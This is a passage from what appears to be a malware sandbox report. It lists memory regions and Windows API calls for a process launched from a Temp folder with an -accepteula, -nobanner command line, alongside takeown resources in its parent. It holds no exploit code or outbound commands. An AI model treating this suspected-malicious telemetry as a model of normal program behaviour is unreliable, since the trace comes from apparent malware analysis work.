"c:\\windows\\syswow64\\kernel32.dll") Region: id = 8805 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8806 start_va = 0x4580000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 8807 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8808 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8847 start_va = 0x43e0000 end_va = 0x43effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043e0000" filename = "" Region: id = 8848 start_va = 0x7f360000 end_va = 0x7f45ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f360000" filename = "" Region: id = 8902 start_va = 0x46e0000 end_va = 0x479dfff entry_point = 0x46e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8903 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8904 start_va = 0x44e0000 end_va = 0x451ffff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 8905 start_va = 0x4520000 end_va = 0x455ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 8906 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8907 start_va = 0x7f48a000 end_va = 0x7f48cfff entry_point = 0x0 region_type = private name = "private_0x000000007f48a000" filename = "" Region: id = 8908 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8909 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8910 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8911 start_va = 0x43f0000 end_va = 0x43f3fff entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 8912 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8913 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8914 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8915 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8916 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8917 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8918 start_va = 0x47a0000 end_va = 0x483ffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 8919 start_va = 0x4580000 end_va = 0x45a9fff entry_point = 0x4580000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8920 start_va = 0x45e0000 end_va = 0x46dffff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 8921 start_va = 0x4840000 end_va = 0x49c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 8922 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8923 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8924 start_va = 0x4400000 end_va = 0x4404fff entry_point = 0x4400000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 8925 start_va = 0x49d0000 end_va = 0x4b50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049d0000" filename = "" Region: id = 8926 start_va = 0x4b60000 end_va = 0x5f5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 8927 start_va = 0x4560000 end_va = 0x4560fff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 8928 start_va = 0x4580000 end_va = 0x4580fff entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 8937 start_va = 0x5f60000 end_va = 0x6296fff entry_point = 0x5f60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8938 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8939 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 944 os_tid = 0x4c0 Thread: id = 950 os_tid = 0x8f0 Process: id = "125" image_name = "vidhs3md64.exe" filename = "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe" page_root = "0x69687000" os_pid = "0x834" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "120" os_parent_pid = "0x904" cmd_line = "vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8785 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8786 start_va = 0x30000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8787 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8788 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 8789 start_va = 0x7fac6000 end_va = 0x7fac6fff entry_point = 0x0 region_type = private name = "private_0x000000007fac6000" filename = "" Region: id = 8790 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8791 start_va = 0x140000000 end_va = 0x140045fff entry_point = 0x140000000 region_type = mapped_file name = "vidhs3md64.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe") Region: id = 8792 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 8793 start_va = 0x7ff5ffffc000 end_va = 0x7ff5ffffdfff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffc000" filename = "" Region: id = 8794 start_va = 0x7ff5ffffe000 end_va = 0x7ff5ffffefff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffe000" filename = "" Region: id = 8795 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8799 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 8800 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8870 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8871 start_va = 0x180000 end_va = 0x23dfff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8872 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 8873 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 8874 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8875 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8876 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8877 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8878 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 8879 start_va = 0x7ff5ffffa000 end_va = 0x7ff5ffffbfff entry_point = 0x0 region_type = private name = "private_0x00007ff5ffffa000" filename = "" Region: id = 8880 start_va = 0x7ffaf7930000 end_va = 0x7ffaf7a07fff entry_point = 0x7ffaf7930000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 8881 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8882 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8883 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8884 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 8885 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8886 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8887 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 8888 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 8889 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8890 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8891 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 8892 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 8893 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8894 start_va = 0x7ffae5c40000 end_va = 0x7ffae5ce9fff entry_point = 0x7ffae5c40000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 8895 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 8896 start_va = 0x450000 end_va = 0x5d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 8897 start_va = 0x5e0000 end_va = 0x613fff entry_point = 0x5e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8898 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8899 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8900 start_va = 0x5e0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 8901 start_va = 0x240000 end_va = 0x246fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 8931 start_va = 0x5e0000 end_va = 0x760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 8932 start_va = 0x770000 end_va = 0x770fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 8933 start_va = 0x780000 end_va = 0x780fff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 8934 start_va = 0x7c0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 8935 start_va = 0x7d0000 end_va = 0x1bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 8936 start_va = 0x1bd0000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 8940 start_va = 0x1bd0000 end_va = 0x1cd9fff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 8941 start_va = 0x1db0000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Thread: id = 946 os_tid = 0x268 [0288.101] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0288.101] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName=0x1400212e0) returned 0x7ffaf70f02a0 [0288.101] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsFree") returned 0x7ffaf70f23f0 [0288.101] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsGetValue") returned 0x7ffaf70e63c0 [0288.101] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlsSetValue") returned 0x7ffaf70ed920 [0288.101] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffaf70f5620 [0288.101] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateEventExW") returned 0x7ffaf70f5580 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSemaphoreExW") returned 0x7ffaf70f55e0 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadStackGuarantee") returned 0x7ffaf70f0e10 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolTimer") returned 0x7ffaf70ef110 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolTimer") returned 0x7ffaf7a4cb10 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7ffaf7a55790 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolTimer") returned 0x7ffaf7a4ea10 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateThreadpoolWait") returned 0x7ffaf70f28c0 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetThreadpoolWait") returned 0x7ffaf7a4c470 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CloseThreadpoolWait") returned 0x7ffaf7a55410 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FlushProcessWriteBuffers") returned 0x7ffaf7aa42f0 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7ffaf7a895e0 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentProcessorNumber") returned 0x7ffaf7aa3130 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLogicalProcessorInformation") returned 0x7ffaf70f0fb0 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CreateSymbolicLinkW") returned 0x7ffaf7112720 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetDefaultDllDirectories") returned 0x7ffaf4f0e7a0 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="EnumSystemLocalesEx") returned 0x7ffaf71128e0 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="CompareStringEx") returned 0x7ffaf70e6010 [0288.102] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetDateFormatEx") returned 0x7ffaf7112a00 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetLocaleInfoEx") returned 0x7ffaf70f0310 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTimeFormatEx") returned 0x7ffaf7112bc0 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetUserDefaultLocaleName") returned 0x7ffaf70f25d0 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsValidLocaleName") returned 0x7ffaf7112cd0 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="LCMapStringEx") returned 0x7ffaf70e6000 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetCurrentPackageId") returned 0x7ffaf4ea45e0 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetTickCount64") returned 0x7ffaf70e65a0 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0288.103] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0288.104] GetCurrentThreadId () returned 0x268 [0288.104] GetStartupInfoW (in: lpStartupInfo=0x14fe90 | out: lpStartupInfo=0x14fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x25bd10)) [0288.104] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0288.104] GetFileType (hFile=0x8) returned 0x2 [0288.104] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0288.104] GetFileType (hFile=0xc) returned 0x3 [0288.104] GetStdHandle (nStdHandle=0xfffffff4) returned 0x10 [0288.104] GetFileType (hFile=0x10) returned 0x2 [0288.104] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner" [0288.104] GetEnvironmentStringsW () returned 0x264010* [0288.104] FreeEnvironmentStringsW (penv=0x264010) returned 1 [0288.104] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 0x33 [0288.106] GetLastError () returned 0x0 [0288.106] SetLastError (dwErrCode=0x0) [0288.106] GetLastError () returned 0x0 [0288.106] SetLastError (dwErrCode=0x0) [0288.106] GetLastError () returned 0x0 [0288.106] SetLastError (dwErrCode=0x0) [0288.106] GetACP () returned 0x4e4 [0288.106] GetLastError () returned 0x0 [0288.106] SetLastError (dwErrCode=0x0) [0288.106] IsValidCodePage (CodePage=0x4e4) returned 1 [0288.106] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fe00 | out: lpCPInfo=0x14fe00) returned 1 [0288.106] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f8a0 | out: lpCPInfo=0x14f8a0) returned 1 [0288.106] GetLastError () returned 0x0 [0288.106] SetLastError (dwErrCode=0x0) [0288.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.106] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䨑⯓") returned 256 [0288.106] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䨑⯓", cchSrc=256, lpCharType=0x14fbc0 | out: lpCharType=0x14fbc0) returned 1 [0288.106] GetLastError () returned 0x0 [0288.106] SetLastError (dwErrCode=0x0) [0288.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0288.107] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 